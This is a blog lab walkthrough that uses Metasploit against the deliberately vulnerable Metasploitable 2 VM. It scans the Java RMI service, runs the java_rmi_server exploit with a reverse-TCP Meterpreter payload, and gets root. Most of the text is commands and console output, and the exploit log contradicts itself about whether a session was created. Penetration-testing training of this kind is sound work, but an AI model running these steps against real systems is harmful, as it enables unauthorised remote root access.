Metasploitable 2 Server: Exploiting java_rmi (Java Remote Method Invocation) to gain root access

Auxiliary scanning using msfconsole
Exploiting Java_RMI

Goal: Exploit Java Remote Method Invocation (java_rmi) to Get Root access.

Java Remote Method Invocation, or Java RMI, is an object-oriented RPC mechanism that allows an object located in one Java virtual machine to call methods on an object located in another Java virtual machine. This enables developers to write distributed applications using an object-oriented paradigm.

Auxiliary scanning using msfconsole

Start the Metasploit database and console by typing the below command in the terminal:

┌─[mrdev@mr-dev]─[~]

└──╼ $ sudo msfdb init && sudo msfconsole

[sudo] password for mrdev:

[+] Starting database

[i] The database appears to be already configured, skipping initialization

Call trans opt: received. 2-19-98 13:24:18 REC:Loc

Trace program: running

wake up, Neo...

the matrix has you

follow the white rabbit.

knock, knock, Neo.

(`. ,-,

` `. ,;' /

`. ,'/ .'

`. X /.'

.-;--''--.._` ` (

.' / `

, ` ' Q '

, , `._ \

,.| ' `-.;_'

: . ` ; ` ` --,.._;

' ` , ) .'

`._ , ' /_

; ,''-,;' ``-

``-..__``--`

https://metasploit.com

=[ metasploit v6.1.9-dev ]

+ -- --=[ 2169 exploits - 1149 auxiliary - 398 post ]

+ -- --=[ 592 payloads - 45 encoders - 10 nops ]

+ -- --=[ 9 evasion ]

Metasploit tip: To save all commands executed since start up to a file, use the makerc command

msf6 >

There's an auxiliary scanner we can use to detect whether the Java RMI vulnerability exists on our target; At the prompt, type search java_rmi and log the "auxiliary/scanner/misc/java_rmi_server" module.

msf6 > search java_rmi

Matching Modules

================

# Name Disclosure Date Rank Check Description

- ---- --------------- ---- ----- -----------

0 auxiliary/gather/java_rmi_registry normal No Java RMI Registry Interfaces Enumeration

1 exploit/multi/misc/java_rmi_server 2011-10-15 excellent Yes Java RMI Server Insecure Default Configuration Java Code Execution

2 auxiliary/scanner/misc/java_rmi_server 2011-10-15 normal No Java RMI Server Insecure Endpoint Code Execution Scanner

3 exploit/multi/browser/java_rmi_connection_impl 2010-03-31 excellent No Java RMIConnectionImpl Deserialization Privilege Escalation

Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/browser/java_rmi_connection_impl

msf6 >

Next, enter use auxiliary/scanner/misc/java_rmi_server, and type options to display the settings.

msf6 > use 2

msf6 auxiliary(scanner/misc/java_rmi_server) > show options

Module options (auxiliary/scanner/misc/java_rmi_server):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

RPORT 1099 yes The target port (TCP)

THREADS 1 yes The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/misc/java_rmi_server) >

The options indicate that we have to set the RHOSTS and THREADS. Once everything is fine execute and run the command to find out if the java_rmi exploit is possible or not.

msf6 auxiliary(scanner/misc/java_rmi_server) > set RHOSTS 192.168.56.3

RHOSTS => 192.168.56.3

msf6 auxiliary(scanner/misc/java_rmi_server) > set THREADS 16

THREADS => 16

msf6 auxiliary(scanner/misc/java_rmi_server) > run

[+] 192.168.56.3:1099 - 192.168.56.3:1099 Java RMI Endpoint Detected: Class Loader Enabled

[*] 192.168.56.3:1099 - Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf6 auxiliary(scanner/misc/java_rmi_server) >

We can see that the scanner detected a Java RMI endpoint on port 1099, which suggests the target may be vulnerable. Let's try to exploit it.

Exploiting Java_RMI

Back in our previous search results, locate the "exploit/multi/misc/java_rmi_server" module, and type use exploit/multi/misc/java_rmi_server to load it.

msf6 auxiliary(scanner/misc/java_rmi_server) >
 use exploit/multi/misc/java_rmi_server

[*] No payload configured, defaulting to java/meterpreter/reverse_tcp

msf6 exploit(multi/misc/java_rmi_server) >

From the upper command, the payload is automatically configured to java/meterpreter/reverse_tcp. If you want to configure payload, then run set payload {payload options}.

To find out compatible payloads, then use the show payloads command to display the compatible payloads for this exploit.

msf6 exploit(multi/misc/java_rmi_server) > show payloads

Compatible Payloads

===================

# Name Disclosure Date Rank Check Description

- ---- --------------- ---- ----- -----------

0 payload/generic/custom normal No Custom Payload

1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline

2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline

3 payload/java/jsp_shell_bind_tcp normal No Java JSP Command Shell, Bind TCP Inline

4 payload/java/jsp_shell_reverse_tcp normal No Java JSP Command Shell, Reverse TCP Inline

5 payload/java/meterpreter/bind_tcp normal No Java Meterpreter, Java Bind TCP Stager

6 payload/java/meterpreter/reverse_http normal No Java Meterpreter, Java Reverse HTTP Stager

7 payload/java/meterpreter/reverse_https normal No Java Meterpreter, Java Reverse HTTPS Stager

8 payload/java/meterpreter/reverse_tcp normal No Java Meterpreter, Java Reverse TCP Stager

9 payload/java/shell/bind_tcp normal No Command Shell, Java Bind TCP Stager

10 payload/java/shell/reverse_tcp normal No Command Shell, Java Reverse TCP Stager

11 payload/java/shell_reverse_tcp normal No Java Command Shell, Reverse TCP Inline

12 payload/multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)

13 payload/multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)

msf6 exploit(multi/misc/java_rmi_server) > options

Module options (exploit/multi/misc/java_rmi_server):

Name Current Setting Required Description

---- --------------- -------- -----------

HTTPDELAY 10 yes Time that the HTTP Server will wait for the payload request

RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasplo

RPORT 1099 yes The target port (TCP)

SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local mac

hine or 0.0.0.0 to listen on all addresses.

SRVPORT 8080 yes The local port to listen on.

SSL false no Negotiate SSL for incoming connections

SSLCert no Path to a custom SSL certificate (default is randomly generated)

URIPATH no The URI to use for this exploit (default is random)

Payload options (java/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

LHOST 192.xxx.xx.xxx yes The listen address (an interface may be specified)

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Generic (Java Payload)

msf6 exploit(multi/misc/java_rmi_server) >

From above we have found out that we have to set the LHOST and RHOST and the run exploit command.

msf6 exploit(multi/misc/java_rmi_server) > 
set RHOSTS 192.168.56.3

RHOSTS => 192.168.56.3

msf6 exploit(multi/misc/java_rmi_server) > 
set LHOST 192.168.56.1

LHOST => 192.168.56.1

msf6 exploit(multi/misc/java_rmi_server) > 
exploit

[*] Started reverse TCP handler on 192.168.56.1:4444 

[*] 192.168.56.3:1099 - Using URL: http://0.0.0.0:8080/GRw8tQO7

[*] 192.168.56.3:1099 - Local IP: http://192.168.43.192:8080/GRw8tQO7

[*] 192.168.56.3:1099 - Server started.

[*] 192.168.56.3:1099 - Sending RMI Header...

[*] 192.168.56.3:1099 - Sending RMI Call...

[*] 192.168.56.3:1099 - Replied to request for payload JAR

[*] Sending stage (58060 bytes) to 192.168.56.3

[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:51528) at 2022-01-20 15:37:03 +0530

[-] 192.168.56.3:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request

[*] 192.168.56.3:1099 - Server stopped.

[*] Exploit completed, but no session was created.

msf6 exploit(multi/misc/java_rmi_server) >

From above, we found that a meterpreter session was created and you can find out the session using the below command:

msf6 exploit(multi/misc/java_rmi_server) > sessions

Active sessions

===============

Id Name Type Information Connection

-- ---- ---- ----------- ----------

1 meterpreter java/linux root @ metasploitable 192.168.56.1:4444 -> 192.168.56.3:51528 (192.168.56.3)

msf6 exploit(multi/misc/java_rmi_server) >

From above we found an active meterpreter session. Use the below command to get the meterpreter prompt:

msf6 exploit(multi/misc/java_rmi_server) > sessions -i 1

[*] Starting interaction with 1...

meterpreter > getuid

Server username: root

meterpreter > sysinfo

Computer : metasploitable

OS : Linux 2.6.24-16-server (i386)

Meterpreter : java/linux

meterpreter >

Metasploitable 2 Server: Exploiting java_rmi (Java Remote Method Invocation) to gain root access

Table of Contents

Auxiliary scanning using msfconsole

Exploiting Java_RMI

Post a Comment

Social Plugin

Popular Posts

ANDRAX: The Cracker Technology

Bypassing Web Application Firewall using Tamper Script via SQLMap

Apktool: A tool for reverse engineering Android apk files

Labels

Most Recent

Comments

About Us

Follow Us

Footer Copyright

#buttons=(Ok, Go it!) #days=(20)

Contact form

Metasploitable 2 Server: Exploiting java_rmi (Java Remote Method Invocation) to gain root access

Table of Contents

Auxiliary scanning using msfconsole

Exploiting Java_RMI

You may like these posts

Post a Comment

#buttons=(Ok, Go it!) #days=(20)

Contact form